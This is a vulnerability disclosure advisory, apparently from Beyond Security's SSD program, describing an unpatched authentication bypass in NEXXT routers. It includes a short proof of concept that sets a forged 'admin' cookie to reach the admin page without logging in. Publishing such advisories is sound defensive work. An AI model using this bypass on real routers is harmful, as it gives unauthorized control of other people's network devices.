SSD Advisory – NEXXT Authentication Bypass

Vulnerability Summary
The following advisory describes an authentication bypass found in NEXXT routers.
NEXXT Connectivity Solutions develops “state of the art networking devices that help connect people and things together, at home, the office and virtually everywhere”.
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
We tried to contact NEXXT since August 17 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.

Vulnerability details
User controlled input is not sufficiently sanitized and can be exploit by an attacker to bypass the authentication mechanism.
By changing the cookie, an attacker can bypass the login authentication mechanism and login as admin.
Proof of Concept
The setup for testing the PoC we will use Chrome Browser with EditThisCokie plugin.
Browse to the victim’s IP – http://IP:8080/login.asp

Add a new cookie: admin:language=en

Then direct open: http://IP:8080/advance.asp


Get in touch